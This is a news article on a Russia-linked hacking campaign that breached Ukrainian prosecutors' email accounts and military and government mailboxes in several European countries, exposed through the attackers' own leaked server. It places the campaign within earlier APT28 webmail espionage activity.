WASHINGTON — Russia-linked hackers breached more than 170 email accounts belonging to Ukrainian prosecutors and investigators in a campaign that also hit military and government targets in Romania, Greece, Bulgaria and Serbia, according to data reviewed by Reuters, April 15, 2026.
The breach matters because the attackers appear to have exposed parts of their own infrastructure, giving researchers an unusually clear view of how the operation stole credentials, copied emails, captured two-factor authentication data and set up covert mail-forwarding rules to keep collecting intelligence after the initial compromise.
How the Ukrainian prosecutors email breach exposed the wider campaign
In a detailed March 2026 write-up, Ctrl-Alt-Intel said the attackers made a “huge operational blunder” by leaving exposed material that included more than 11,000 stolen emails, more than 240 stolen credential sets, more than 140 forwarding rules and telemetry tied to at least 284 compromised inboxes between September 2024 and March 2026. The group said the same server had been linked to activity stretching back more than 500 days, suggesting the campaign persisted long after earlier warning signs emerged.
The victim list went well beyond local prosecutors. Reuters said the targets included the Specialized Prosecutor’s Office in the Field of Defense, the Asset Recovery and Management Agency, the Prosecutor’s Training Center and at least one senior mailbox tied to the Specialized Anti-Corruption Prosecutor’s Office. Outside Ukraine, the exposed data pointed to at least 67 Romanian Air Force accounts and 27 inboxes managed by Greece’s Hellenic National Defense General Staff, alongside smaller sets tied to Bulgaria and Serbia.
An earlier Hunt.io investigation into the same infrastructure described an exposed Roundcube exploitation toolkit, command-and-control components and operator artifacts consistent with an APT28-style webmail intrusion set. In practice, that meant researchers were not just seeing the aftermath of the intrusions. They were seeing pieces of the toolset used to run them.
Why prosecutors and anti-corruption offices were prime targets
Prosecutors, anti-corruption investigators and asset-recovery officials sit near some of the most sensitive information in wartime Ukraine. Their email can reveal case strategy, seized assets, suspected collaborators, military misconduct allegations and internal friction inside state institutions. Analysts who reviewed the victimology told Reuters the likely goal was to monitor investigations that could expose Russian agents or collect material that could later be used for leverage or disinformation.
What makes this operation especially dangerous is the depth of access it appears to have achieved. The technical reporting suggests the attackers were not limited to reading a few messages. They could harvest saved credentials, exfiltrate inboxes and sent mail, mine contact lists and, in some cases, steal the secrets used to generate time-based one-time passwords. That kind of access can turn a single phishing success into sustained, quiet surveillance.
Russia has repeatedly denied carrying out hacking operations against other countries. In this case, Reuters reported that the Russian embassy in Washington did not respond to requests for comment. Attribution also carries some nuance: Ctrl-Alt-Intel pointed to Fancy Bear, while other researchers cited by Reuters agreed the activity was tied to Moscow even if they did not fully align on the exact subgroup.
The campaign fits a longer pattern
This breach did not emerge in isolation. In May 2024, CERT Polska warned that an APT28 campaign was targeting Polish government institutions, highlighting how official communications in frontline European states were already under pressure.
By May 2025, ESET’s Operation RoundPress report had described a webmail-focused espionage campaign hitting Ukrainian governmental entities and defense-linked targets in Bulgaria and Romania through XSS flaws in platforms such as Roundcube, Horde, MDaemon and Zimbra.
And in July 2025, CERT-UA said APT28 was using Signal-delivered malicious documents against Ukrainian government agencies, showing that the delivery methods were changing even as the targets stayed familiar.
Seen together, those earlier warnings make the Ukrainian prosecutors email breach look less like a one-off incident and more like the continuation of a durable collection effort aimed at the officials, institutions and partner countries most involved in Ukraine’s war effort and internal cleanup.
Why Europe should pay attention
The wider lesson is that ordinary public-sector email remains a strategic weak point. Vulnerable webmail portals, weak session controls and overlooked forwarding rules can give spies access not only to messages, but also to contact networks, investigative planning and diplomatic context. When that access spans Ukrainian prosecutors and military or government accounts in allied states, the intelligence value rises sharply.
For Ukraine, the immediate story is the compromise of prosecutor and investigator communications. For Europe, the bigger story is that a single exposed server appears to have illuminated a regional spying effort that had been running for months. That is what turns this from a national breach into a continental security story.
